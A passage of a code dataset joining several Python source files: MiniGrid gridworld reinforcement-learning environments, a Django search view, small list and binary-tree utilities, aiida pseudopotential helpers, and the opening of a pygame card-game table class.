box which is placed in another room, behind a locked door. The door is also blocked by a ball which the agent has to move before it can unlock the door. Hence, the agent has to learn to move the ball, pick up the key, open the door and pick up the object in the other room.\n \"\"\"\n _requires_language = False\n\n def __init__(self, max_steps=None, **kwargs):\n room_size = 6\n super().__init__(\n num_rows=1,\n num_cols=2,\n room_size=room_size,\n max_steps=16 * room_size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n # Add a box to the room on the right\n self.obj = self.add_object(0, 1, kind='box')\n # Make sure the two rooms are directly connected by a locked door\n door = self.add_door(0, 0, door_idx='right', locked=True)\n # Block the door with a ball\n color = self.rng.choice(COLORS)\n self[door.pos[0], door.pos[1] - 1] = Ball(color)\n # Add a key to unlock the door\n self.add_object(0, 0, 'key', door.color)\n self.place_agent(i=0, j=0)\n\n self.mission = f'pick up the {self.obj.color} {self.obj.type}'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.actions[action] == 'pickup':\n if self.agent.is_carrying:\n if self.agent.carrying is self.obj:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass _ObstructedMaze(RoomGrid):\n \"\"\"\n The agent has to pick up a box which is placed in a corner of a 3x3 maze. The doors are locked, the keys are hidden in boxes and doors are obstructed by balls.\n \"\"\"\n _requires_language = False\n\n def __init__(self,\n num_rows,\n num_cols,\n num_rooms_visited,\n max_steps=None,\n **kwargs\n ):\n room_size = 6\n\n super().__init__(\n room_size=room_size,\n num_rows=num_rows,\n num_cols=num_cols,\n max_steps=4 * num_rooms_visited * room_size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n # Define the color of the ball to pick up\n self.ball_to_find_color = COLORS[0]\n # Define the color of the balls that obstruct doors\n self.blocking_ball_color = COLORS[1]\n # Define the color of boxes in which keys are hidden\n self.box_color = COLORS[2]\n\n self.mission = f'pick up the {self.ball_to_find_color} ball'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.actions[action] == 'pickup':\n if self.agent.is_carrying:\n if self.agent.carrying is self.obj:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n def add_door(self, i, j, door_idx='right', color=None, locked=False, key_in_box=False, blocked=False):\n \"\"\"\n Add a door. If the door must be locked, it also adds the key.\n If the key must be hidden, it is put in a box. 
If the door must\n be obstructed, it adds a ball in front of the door.\n \"\"\"\n\n door = super().add_door(i, j, door_idx=door_idx, color=color, locked=locked)\n\n if blocked: # place a ball in front of the door\n if door_idx == 'right':\n offset = (0, -1)\n elif door_idx == 'down':\n offset = (-1, 0)\n elif door_idx == 'left':\n offset = (0, 1)\n elif door_idx == 'up':\n offset = (1, 0)\n pos = (door.pos[0] + offset[0], door.pos[1] + offset[1])\n self[pos] = Ball(self.blocking_ball_color)\n\n if locked:\n obj = Key(door.color)\n if key_in_box:\n box = Box(self.box_color) if key_in_box else None\n box.contains = obj\n obj = box\n self.place_in_room(i, j, obj)\n\n return door\n\n\nclass ObstructedMaze_1Dlhb(_ObstructedMaze):\n \"\"\"\n A blue ball is hidden in a 2x1 maze. A locked door separates\n rooms. Doors are obstructed by a ball and keys are hidden in boxes.\n \"\"\"\n _requires_language = False\n\n def __init__(self, key_in_box=True, blocked=True, max_steps=None, **kwargs):\n self.key_in_box = key_in_box\n self.blocked = blocked\n\n super().__init__(\n num_rows=1,\n num_cols=2,\n num_rooms_visited=2,\n max_steps=max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n self.add_door(0, 0, door_idx='right',\n color=self.rng.choice(COLORS),\n locked=True,\n key_in_box=self.key_in_box,\n blocked=self.blocked)\n\n self.obj = self.add_object(0, 1, 'ball', color=self.ball_to_find_color)\n self.place_agent(i=0, j=0)\n\n\nclass ObstructedMaze_Full(_ObstructedMaze):\n \"\"\"\n A blue ball is hidden in one of the 4 corners of a 3x3 maze. Doors\n are locked, doors are obstructed by a ball and keys are hidden in\n boxes.\n \"\"\"\n _requires_language = False\n\n def __init__(self, agent_room=(1, 1), key_in_box=True, blocked=True,\n num_quarters=4, num_rooms_visited=25, max_steps=None, **kwargs):\n self.agent_room = agent_room\n self.key_in_box = key_in_box\n self.blocked = blocked\n self.num_quarters = num_quarters\n\n super().__init__(\n num_rows=3,\n num_cols=3,\n num_rooms_visited=num_rooms_visited,\n max_steps=max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n super()._gen_grid(height, width)\n\n middle_room = (1, 1)\n # Define positions of \"side rooms\" i.e. 
rooms that are neither\n # corners nor the center.\n side_rooms = {\n 'right': (1, 2),\n 'down': (2, 1),\n 'left': (1, 0),\n 'up': (0, 1)\n }\n # Pick a distinct random color for each door direction\n door_colors = self.rng.choice(COLORS, size=len(side_rooms), replace=False)\n door_colors = {\n 'right': door_colors[0],\n 'down': door_colors[1],\n 'left': door_colors[2],\n 'up': door_colors[3]\n }\n\n side_rooms = list(side_rooms.items())[:self.num_quarters]\n for door_idx, side_room in side_rooms:\n # Add a door between the center room and the side room\n door_color = door_colors[door_idx]\n self.add_door(*middle_room, door_idx=door_idx, color=door_color, locked=False)\n\n for k in [-1, 1]:\n # Add a door to each side of the side room\n side_door_idx = self._door_idx(door_idx, k)\n side_door_color = door_colors[side_door_idx]\n self.add_door(*side_room, locked=True,\n door_idx=side_door_idx,\n color=side_door_color,\n key_in_box=self.key_in_box,\n blocked=self.blocked)\n\n corners = [(0, 2), (2, 2), (2, 0), (0, 0)]\n ball_room = corners[self.rng.randint(self.num_quarters)]\n\n self.obj = self.add_object(*ball_room, 'ball', color=self.ball_to_find_color)\n self.place_agent(i=self.agent_room[0], j=self.agent_room[1])\n\n\nclass DistShift(MiniGridEnv):\n \"\"\"\n Distributional shift environment\n\n This environment is based on one of the DeepMind [AI safety gridworlds](https://github.com/deepmind/ai-safety-gridworlds). The agent starts in the top-left corner and must reach the goal which is in the top-right corner, but has to avoid stepping into lava on its way. The aim of this environment is to test an agent's ability to generalize. There are two slightly different variants of the environment, so that the agent can be trained on one variant and tested on the other.\n \"\"\"\n\n def __init__(\n self,\n width=9,\n height=7,\n agent_start_pos=(1,1),\n agent_start_state='right',\n strip2_row=2,\n max_steps=None,\n **kwargs\n ):\n self.agent_start_pos = agent_start_pos\n self.agent_start_state = agent_start_state\n self.goal_pos = (1, width - 2)\n self.strip2_row = strip2_row\n\n super().__init__(\n width=width,\n height=height,\n max_steps=4 * width * height if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place a goal square in the top-right corner (row 1, column width - 2)\n self[self.goal_pos] = Goal()\n\n # Place the lava rows\n for j in range(self.width - 6):\n self[1, 3 + j] = Lava()\n self[self.strip2_row, 3 + j] = Lava()\n\n # Place the agent\n if self.agent_start_pos is not None:\n self.agent.pos = self.agent_start_pos\n self.agent.state = self.agent_start_state\n else:\n self.place_agent()\n\n self.mission = 'get to the green goal square'\n\n\nclass LavaGap(MiniGridEnv):\n \"\"\"\n The agent has to reach the green goal square at the opposite corner of the room, and must pass through a narrow gap in a vertical strip of deadly lava. Touching the lava terminates the episode with a zero reward.
This environment is useful for studying safety and safe exploration.\n \"\"\"\n\n def __init__(self, size=7, obstacle_type=Lava, max_steps=None, **kwargs):\n self.obstacle_type = obstacle_type\n super().__init__(\n height=size,\n width=size,\n max_steps=4 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n assert width >= 5 and height >= 5\n\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place the agent in the top-left corner\n self.agent.pos = (1, 1)\n self.agent.state = 'right'\n\n # Place a goal square in the bottom-right corner\n self[height - 2, width - 2] = Goal()\n\n # Generate and store random gap position\n gap_pos = (self.rng.randint(1, height - 1),\n self.rng.randint(2, width - 2))\n\n # Place the obstacle wall\n self.vert_wall(1, gap_pos[1], height=height - 2,\n obj=self.obstacle_type)\n\n # Put a hole in the wall\n self[gap_pos].clear()\n\n # obstacle_type holds the class itself, so compare identity directly;\n # type(self.obstacle_type) would be the metaclass and never equal Lava\n if self.obstacle_type is Lava:\n self.mission = 'avoid the lava and get to the green goal square'\n else:\n self.mission = 'find the opening and get to the green goal square'\n\n\nclass _Crossing(MiniGridEnv):\n \"\"\"\n Environment with wall or lava obstacles, sparse reward.\n \"\"\"\n\n def __init__(self, size=9, num_crossings=1, obstacle_type=Lava, max_steps=None, **kwargs):\n self.num_crossings = num_crossings\n self.obstacle_type = obstacle_type\n super().__init__(\n height=size,\n width=size,\n max_steps=4 * size * size if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n assert width % 2 == 1 and height % 2 == 1 # odd size\n\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place the agent in the top-left corner\n self.agent.pos = (1, 1)\n self.agent.state = 'right'\n\n # Place a goal square in the bottom-right corner\n self[height - 2, width - 2] = Goal()\n\n # Place obstacles (lava or walls)\n\n # Lava rivers or walls specified by direction and position in grid\n rivers = [('v', i) for i in range(2, width - 2, 2)]\n rivers += [('h', j) for j in range(2, height - 2, 2)]\n self.rng.shuffle(rivers)\n rivers = rivers[:self.num_crossings] # sample random rivers\n rivers_v = sorted([pos for d, pos in rivers if d == 'v'])\n rivers_h = sorted([pos for d, pos in rivers if d == 'h'])\n obstacle_pos = itertools.chain(\n itertools.product(range(1, height - 1), rivers_v),\n itertools.product(rivers_h, range(1, width - 1)),\n )\n for pos in obstacle_pos:\n self[pos] = self.obstacle_type()\n\n # Sample path to goal\n path = ['v'] * len(rivers_v) + ['h'] * len(rivers_h)\n self.rng.shuffle(path)\n\n # Create openings\n limits_h = [0] + rivers_h + [height - 1]\n limits_v = [0] + rivers_v + [width - 1]\n room_i, room_j = 0, 0\n for direction in path:\n if direction == 'h':\n i = limits_h[room_i + 1]\n j = self.rng.choice(\n range(limits_v[room_j] + 1, limits_v[room_j + 1]))\n room_i += 1\n elif direction == 'v':\n i = self.rng.choice(\n range(limits_h[room_i] + 1, limits_h[room_i + 1]))\n j = limits_v[room_j + 1]\n room_j += 1\n self[i, j].clear()\n\n # Same identity check as in LavaGap: obstacle_type is the class itself\n if self.obstacle_type is Lava:\n self.mission = 'avoid the lava and get to the green goal square'\n else:\n self.mission = 'find the opening and get to the green goal square'\n\n\nclass LavaCrossing(_Crossing):\n \"\"\"\n The agent has to reach the green goal square on the other corner of the room while avoiding rivers
of deadly lava which terminate the episode in failure. Each lava stream runs across the room either horizontally or vertically, and has a single crossing point which can be safely used; luckily, a path to the goal is guaranteed to exist. This environment is useful for studying safety and safe exploration.\n \"\"\"\n\n def __init__(self, size=9, num_crossings=1, max_steps=None, **kwargs):\n super().__init__(size=size, num_crossings=num_crossings, obstacle_type=Lava, max_steps=max_steps, **kwargs)\n\n\nclass SimpleCrossing(_Crossing):\n \"\"\"\n Similar to the LavaCrossing environment, the agent has to reach the green goal square on the other corner of the room, however lava is replaced by walls. This MDP is therefore much easier and may be useful for quickly testing your algorithms.\n \"\"\"\n\n def __init__(self, size=11, num_crossings=5, max_steps=None, **kwargs):\n super().__init__(size=size, num_crossings=num_crossings,\n obstacle_type=Wall, max_steps=max_steps, **kwargs)\n\n\nclass DynamicObstacles(MiniGridEnv):\n \"\"\"\n This environment is an empty room with moving obstacles. The goal of the agent is to reach the green goal square without colliding with any obstacle. A large penalty is subtracted if the agent collides with an obstacle and the episode finishes. This environment is useful for testing dynamic obstacle avoidance for mobile robots with reinforcement learning under partial observability.\n \"\"\"\n\n def __init__(\n self,\n size=8,\n agent_start_pos=(1, 1),\n agent_start_state='right',\n n_obstacles=4,\n max_steps=None,\n **kwargs\n ):\n self.agent_start_pos = agent_start_pos\n self.agent_start_state = agent_start_state\n\n # Reduce obstacles if there are too many\n if n_obstacles <= size / 2 + 1:\n self.n_obstacles = int(n_obstacles)\n else:\n self.n_obstacles = int(size / 2)\n super().__init__(\n height=size,\n width=size,\n max_steps=4 * size * size if max_steps is None else max_steps,\n **kwargs\n )\n # Allow only 3 actions: left, right, forward\n self.action_space = gym.spaces.Discrete(3)\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place a goal square in the bottom-right corner\n self[height - 2, width - 2] = Goal()\n\n # Place the agent\n if self.agent_start_pos is not None:\n self.agent.pos = self.agent_start_pos\n self.agent.state = self.agent_start_state\n else:\n self.place_agent()\n\n # Place obstacles\n self.obstacles = []\n for i_obst in range(self.n_obstacles):\n self.obstacles.append(Ball())\n self.place_obj(self.obstacles[i_obst], max_tries=100)\n\n self.mission = 'get to the green goal square'\n\n def step(self, action):\n # Invalid action\n if action >= self.action_space.n:\n action = 0\n\n # Check if there is an obstacle in front of the agent\n front_cell = self[self.agent.front_pos]\n not_clear = front_cell.entity is not None and front_cell.entity.type != 'goal'\n\n # Update obstacle positions\n for i_obst in range(len(self.obstacles)):\n old_pos = self.obstacles[i_obst].pos\n top = tuple(map(operator.add, old_pos, (-1, -1)))\n\n try:\n self.place_obj(self.obstacles[i_obst], top=top, size=(3,3), max_tries=100)\n self[old_pos].clear()\n except RecursionError:\n pass\n\n obs, reward, done, info = super().step(action)\n\n # If the agent tries to walk over an obstacle\n if self.actions[action] == 'forward' and not_clear:\n reward = self._lose_reward\n done = True\n return obs, reward, done, info\n\n return obs,
reward, done, info\n\n\nclass Playground(MiniGridEnv):\n \"\"\"\n Environment with multiple rooms and random objects.\n This environment has no specific goals or rewards.\n \"\"\"\n\n def __init__(self, size=19, max_steps=100, **kwargs):\n super().__init__(height=size, width=size, max_steps=max_steps, **kwargs)\n\n def _gen_grid(self, height, width):\n # Create the grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n room_width = width // 3\n room_height = height // 3\n\n # For each row of rooms\n for i in range(3):\n # For each column\n for j in range(3):\n\n i_top = i * room_height\n j_left = j * room_width\n i_bottom = i_top + room_height\n j_right = j_left + room_width\n\n # Right wall and door\n if j + 1 < 3:\n self.vert_wall(i_top, j_right, height=room_height)\n pos = (self.rng.randint(i_top + 1, i_bottom - 1), j_right)\n color = self.rng.choice(COLORS)\n self[pos] = Door(color)\n\n # Bottom wall and door\n if i + 1 < 3:\n self.horz_wall(i_bottom, j_left, width=room_width)\n pos = (i_bottom, self.rng.randint(j_left + 1, j_right - 1))\n color = self.rng.choice(COLORS)\n self[pos] = Door(color)\n\n # Place random objects in the world\n types = ['key', 'ball', 'box']\n for i in range(0, 12):\n obj_type = self.rng.choice(types)\n obj_color = self.rng.choice(COLORS)\n if obj_type == 'key':\n obj = Key(obj_color)\n elif obj_type == 'ball':\n obj = Ball(obj_color)\n elif obj_type == 'box':\n obj = Box(obj_color)\n self.place_obj(obj)\n\n # Randomize the player start position and orientation\n self.place_agent()\n\n # No explicit mission in this environment\n self.mission = ''\n\n\nclass RandomObjects(MiniGridEnv):\n \"\"\"\n This environment is a blank grid filled with randomly placed objects (including wall elements). 
Useful for curriculum learning as the first learning stage.\n \"\"\"\n\n def __init__(self,\n size=16,\n density=.2,\n objects=OBJECTS,\n colors=COLORS,\n max_steps=100,\n surround_walls=True,\n **kwargs):\n self.density = density\n self.objects = objects\n self.colors = colors\n self.surround_walls = surround_walls\n super().__init__(height=size, width=size, max_steps=max_steps, **kwargs)\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n if self.surround_walls:\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n # Place a goal square at a random location\n self.place_obj(Goal())\n\n # Place random objects in the world\n if self.surround_walls:\n mean_n_objs = int((height - 2) * (width - 2) * self.density)\n else:\n mean_n_objs = int(height * width * self.density)\n n_objs = mean_n_objs\n for i in range(n_objs):\n obj = self.make_obj()\n self.place_obj(obj)\n\n # Randomize the player start position and orientation\n agent_pos = (height // 2, width // 2)\n self[agent_pos].clear()\n self.agent.pos = agent_pos\n self.agent.state = self.rng.choice(self.agent.STATES)\n\n self.mission = 'get to a green goal square'\n\n def make_obj(self):\n type_ = self.rng.choice(self.objects)\n color = self.rng.choice(self.colors)\n\n if type_ in ['wall', 'goal', 'lava']:\n obj = entities.make(type_)\n elif type_ == 'door':\n state = self.rng.choice(entities.Door.STATES)\n obj = entities.make(type_, color=color, state=state)\n elif type_ == 'box':\n if self.rng.random() < .5:\n contains = None\n else:\n contains = self.make_obj()\n obj = entities.make(type_, color=color, contains=contains)\n else:\n obj = entities.make(type_, color=color)\n\n return obj\n\n\n# Register all environments with OpenAI gym\nfor name, obj in inspect.getmembers(sys.modules[__name__]):\n if inspect.isclass(obj) and obj.__module__ == __name__ and not name.startswith('_'):\n\n gym.envs.registration.register(\n id=f'MiniGrid-{name}-v1',\n entry_point=f'gym_minigrid.envs:{name}',\n reward_threshold=.95,\n )\n","sub_path":"gym_minigrid/envs.py","file_name":"envs.py","file_ext":"py","file_size_in_byte":61429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
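# --- Registration usage sketch (not part of the record above) ---
# The loop at the end of envs.py registers every public class under the id
# 'MiniGrid-<ClassName>-v1'. Assuming the package imports as gym_minigrid (its
# sub_path above), any environment can then be built through gym's factory;
# the 4-tuple step API matches the step() methods defined in the record.
import gym
import gym_minigrid  # noqa: F401 -- importing runs the registration loop

env = gym.make('MiniGrid-Unlock-v1')
obs = env.reset()
obs, reward, done, info = env.step(env.action_space.sample())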
+{"seq_id":"468745519","text":"from datetime import date\n\nfrom django.views.generic.base import TemplateView\n\nfrom regulations.generator.api_reader import ApiReader\nfrom .utils import get_structure\n\nclient = ApiReader()\n\n\nclass SearchView(TemplateView):\n\n template_name = 'regulations/search.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n results = get_data(self.request.GET.get(\"q\"))\n today = date.today()\n parts = client.effective_parts(today)\n structure = get_structure(parts)\n c = {\n 'parts': parts,\n 'toc': structure,\n 'results': results,\n }\n return {**context, **c, **self.request.GET.dict()}\n\n\ndef get_data(query):\n return client.search(query)\n","sub_path":"regulations/views/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"534989027","text":"def duplicate(a_list):\n n = []\n for i in range(1, len(a_list)):\n k = i - 1\n count = 1\n while k >= 0 and count <= 2:\n if a_list[i] == a_list[k]:\n count += 1\n k -= 1\n if count >= 2:\n if a_list[i] not in n:\n n.append(a_list[i])\n return n\n\n\nprint(duplicate([1, 2, 3, 3, 5, 6, 7, 7, 7, 7]))\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"261962789","text":"class BTnode:\n '''\n class to create an object of binary tree node\n '''\n\n def __init__(self, data):\n '''\n constructor to initialize fields\n such as data\n left pointer\n and right pointer\n '''\n self.data = data\n self.left = None\n self.right = None\n\n\ndef is_leaf(root):\n '''\n utility function to check\n if node is leaf node\n '''\n\n if root.left is None and root.right is None:\n return True\n\n return False\n\n\ndef same_level(root, level, store):\n '''\n Utility function to check\n if current root is a leaf node\n and store the level for it\n then call recursively for left and right\n store is a set that stores the level\n of leaf nodes found\n '''\n\n if root is None:\n return\n\n # check if leaf node\n # if a leaf node then it will not have\n # any child nodes\n if(is_leaf(root)):\n store.add(level)\n return\n\n # call for left and right\n same_level(root.left, level+1, store)\n same_level(root.right, level+1, store)\n\n return\n\n\ndef check(node):\n '''\n main function which calls other \n '''\n\n # initialze a set to store values\n store={}\n\n # call function same_level to fill values in store\n same_level(node,0,store)\n\n # if store has only one elemnt\n # implies that all the leaf nodes\n # are at same level\n if len(store) == 1:\n return True\n \n return False\n","sub_path":"leaf_same_level.py","file_name":"leaf_same_level.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"184353684","text":"# -*- coding: utf-8 -*-\nfrom aiida.orm.data.upf import UpfData, get_pseudos_from_structure\n\n\ndef get_pseudos_of_calc(calc):\n \"\"\"\n Return a dictionary of pseudos used by a given (pw.x, cp.x) calculation.\n\n This returns a dictionary ``pseudos`` that can be set in a builder as ``builder.pseudo = pseudos``.\n\n :param calc: a pw.x or cp.x calculation.\n :return: a dictionary where the key is the kind name and the value is the UpfData object.\n \"\"\"\n from aiida.common.links import LinkType\n\n pseudos = {}\n # I create here a dictionary that associates each kind name to a pseudo\n inputs = calc.get_inputs_dict(link_type=LinkType.INPUT)\n for linkname in inputs.keys():\n if linkname.startswith(calc._get_linkname_pseudo_prefix()):\n # Note that this string might be a sequence of kind names\n # concatenated by an underscore, see implementation in the\n # input plugin implementation.\n multiplekindstring = linkname[len(calc._get_linkname_pseudo_prefix()):]\n pseudos[multiplekindstring] = inputs[linkname]\n return pseudos\n\n\ndef validate_and_prepare_pseudos_inputs(structure, pseudos=None, pseudo_family=None):\n \"\"\"\n Use the explicitly passed pseudos dictionary or use the pseudo_family in combination with\n the structure to obtain that dictionary.\n\n The pseudos dictionary should now be a dictionary of UPF nodes with the kind as linkname\n As such, if there are multiple kinds with the same element, there will be duplicate UPF nodes\n but multiple links for the same input node are not allowed. Moreover, to couple the UPF nodes\n to the Calculation instance, we have to go through the use_pseudo method, which takes the kind\n name as an additional parameter. When creating a Calculation through a Process instance, one\n cannot call the use methods directly but rather should pass them as keyword arguments. 
However,\n we can pass the additional parameters by using them as the keys of a dictionary\n\n :param structure: StructureData node\n :param pseudos: a dictionary where keys are the kind names and value are UpfData nodes\n :param pseudo_family: string name of the pseudopotential family to use\n :raises: ValueError if neither pseudos or pseudo_family is specified or if no UpfData is found for\n every element in the structure\n :returns: a dictionary of UpfData nodes where the key is a tuple with the kind name\n \"\"\"\n from aiida.orm.data.base import Str\n result_pseudos = {}\n unique_pseudos = {}\n\n if pseudos and pseudo_family:\n raise ValueError('You cannot specify both \"pseudos\" and \"pseudo_family\"')\n elif pseudos is None and pseudo_family is None:\n raise ValueError('Neither an explicit pseudos dictionary nor a pseudo_family was specified')\n elif pseudo_family:\n # This will already raise some exceptions, potentially, like the ones below\n pseudos = get_pseudos_from_structure(structure, str(pseudo_family))\n\n if isinstance(pseudos, (str, unicode, Str)):\n raise TypeError('You passed \"pseudos\" as a string - maybe you wanted to pass it as \"pseudo_family\" instead?')\n\n for kind in structure.get_kind_names():\n if kind not in pseudos:\n raise ValueError('no pseudo available for element {}'.format(kind))\n elif not isinstance(pseudos[kind], UpfData):\n raise ValueError('pseudo for element {} is not of type UpfData'.format(kind))\n\n for kind, pseudo in pseudos.iteritems():\n unique_pseudos.setdefault(pseudo, []).append(kind)\n\n for pseudo, kinds in unique_pseudos.iteritems():\n result_pseudos[tuple(kinds)] = pseudo\n\n return result_pseudos\n","sub_path":"aiida_quantumespresso/utils/pseudopotential.py","file_name":"pseudopotential.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
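# --- Kind-grouping sketch (not part of the record above) ---
# The tail of validate_and_prepare_pseudos_inputs() groups kind names that
# share one UpfData node under a single tuple key, so each node is linked only
# once. The same idea with plain dicts ('Fe1'/'Fe2' and the string pseudos are
# made-up stand-ins for illustration, not aiida objects):
pseudos = {'Fe1': 'UPF<Fe>', 'Fe2': 'UPF<Fe>', 'O': 'UPF<O>'}

unique = {}
for kind, pseudo in pseudos.items():
    unique.setdefault(pseudo, []).append(kind)

result = {tuple(kinds): pseudo for pseudo, kinds in unique.items()}
assert result == {('Fe1', 'Fe2'): 'UPF<Fe>', ('O',): 'UPF<O>'}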
+{"seq_id":"267836325","text":"import pygame\nimport cards\nimport view\nimport random\nimport copy\nimport time\nimport pprint\nfrom signalslot import Signal\nfrom ai_comp import ai\nfrom enum import Enum\n\nNUM_OF_PLAYERS = 4\nSTARTING_HAND = 13\nHIGHEST_CARD = 414\nLOWEST_CARD = 102\nVIEW_TRANSPARENT = False # Make the text box not transparent\n\n\nclass GameState(Enum):\n DEALING = 0\n POINT_CHECK = 1\n BIDDING = 2\n PLAYING = 3\n ENDING = 4\n\n\nclass PlayerRole(Enum):\n UNKNOWN = 0\n ATTACKER = 1\n DEFENDER = 2\n\n\nclass Table:\n \"\"\"\n A Table is the place where all actions takes place. It is essentially a FSM, doing different\n routines at each state. It needs to keep track of the score, roles, the rules, etc. It needs\n to ask each player for decisions and respond to them accordingly. The table will also need\n to inform any decision to the Main Screen so that it can update the screen to reflect that\n change through the use of callbacks (Signal and Slot). This call should be minimised by making\n all the changes before calling to update the screen in one go.\n\n FSM cycles\n ---\n Preloop - Prepare the cards once\n - Initiate Players and connect them to the Table\n 1. Shuffle and Deal out cards to Players.\n 2a. Detect weak hands and ask for reshuffle.\n 2b. Return to (1) if any reshuffle occurs, otherwise proceed.\n 3. Bidding round. Randomly pick a starting player, in clockwise manner\n ask for a bid until it is valid.\n 3b. Proceed only if 3 consecutive skips are detected.\n 3c. Ask the winner of the bid a card not in their hand.\n 3d. Set up the player roles, trump suit, rounds to win for both side\n 3e. Play the game. Start with bid winner if NO TRUMP, otherwise\n Starting next to the bid winner.\n 4a. With the first player, ask for any card, excluding trump suits if trump\n is not broken\n 4b. With subsequent players, ask for cards that follow the suit of the first player\n , include trump suit if trump is broken. Ask for any card if the player cannot\n follow suit.\n 4c. Once all 4 players has made valid plays, announce results, update scoring. Announce\n player roles if the partner card is played. Break trump if trump is played.\n 4d. Repeat 4 until 13 rounds are made. Maybe add early win if confirmed one side wins\n 5. Ask for a new game. 
Go back to 1 if true.\n\n All played cards go into a hidden discard pile.\n\n \"\"\"\n update_table = Signal()\n\n def __init__(self, x, y, width, height, clear_colour, autoplay=False, view_all_cards=False):\n # TODO: Reduce the amount of update_table call\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n\n self.table_font = pygame.font.SysFont(\"None\", 25)\n self.player_font = pygame.font.SysFont(\"None\", 25)\n\n # For gameplay\n self.game_state = GameState.DEALING\n self.current_round = 0\n self.passes = 0\n self.current_player = 0\n self.first_player = False # This is for bidding purposes\n self.players = []\n self.players_playzone = []\n # Table status will be made known to the player by reference\n self.table_status = {'played cards': [0, 0, 0, 0], 'leading player': 0, 'trump suit': 1,\n 'trump broken': False, 'round history': [], 'bid': 0, 'partner': 0,\n 'partner reveal': False, 'defender': {'target': 0, 'wins': 0},\n 'attacker': {'target': 0, 'wins': 0}}\n\n # Prepare the surfaces for displaying\n self.background = pygame.Surface((self.width, self.height))\n self.background.fill(clear_colour)\n self.background = self.background.convert()\n\n # TODO: Update the drawing of the table?\n # Prepare the card with dimensions\n w_deck = min(self.height, self.width) * 0.18\n l_deck = min(self.width, self.height) * 0.7\n # This is not a deck as it will never be drawn\n self.discard_deck = cards.prepare_playing_cards(int(w_deck*0.7), int(w_deck*0.9))\n game_margins = 5\n\n # Players' deck positioning\n playerx = ((self.width - l_deck)//2,\n game_margins,\n (self.width - l_deck)//2,\n self.width - w_deck - game_margins)\n playery = (self.height - w_deck - game_margins,\n (self.height - l_deck)//2,\n game_margins,\n (self.height - l_deck)//2)\n h_spacing = 20\n v_spacing = 25\n\n # Middle playfield for announcer and player playing deck positioning\n playfield_margins = 5\n margins_with_w_deck = w_deck + playfield_margins + game_margins\n playfield_x = margins_with_w_deck\n playfield_y = margins_with_w_deck\n playfield_width = self.width - margins_with_w_deck * 2\n playfield_height = self.height - margins_with_w_deck * 2\n\n playdeckx = (playfield_x + (playfield_width - w_deck) / 2,\n playfield_x,\n playfield_x + (playfield_width - w_deck) / 2,\n playfield_x + playfield_width - w_deck)\n playdecky = (playfield_y + playfield_height - w_deck,\n playfield_y + (playfield_height - w_deck) / 2,\n playfield_y,\n playfield_y + (playfield_height - w_deck) / 2)\n\n # Player stats positioning\n stats_width = 100\n self.stats_height = 100\n stats_spacing = 10\n self.player_stats_x = (playdeckx[0] - stats_width - stats_spacing,\n playdeckx[1],\n playdeckx[2] + w_deck + stats_spacing,\n playdeckx[3])\n self.player_stats_y = (playdecky[0] + w_deck - self.stats_height,\n playdecky[1] - self.stats_height - stats_spacing,\n playdecky[2],\n playdecky[3] + w_deck + stats_spacing)\n\n self.player_stats = [[], [], [], []]\n\n # TODO: change surface to use colorkey, maybe, if the performance is tanked\n # Prepare all the player surfaces\n for i in range(4):\n vert = i % 2 == 1\n spacing = h_spacing\n if vert:\n spacing = v_spacing\n\n reveal_mode = cards.DeckReveal.HIDE_ALL\n if i == 0 or view_all_cards:\n reveal_mode = cards.DeckReveal.SHOW_ALL\n self.players.append(Player(playerx[i], playery[i],\n l_deck, w_deck,\n spacing, vert_orientation=vert,\n deck_reveal=reveal_mode))\n self.players[i].connect_to_table(self.table_status)\n if i > 0:\n 
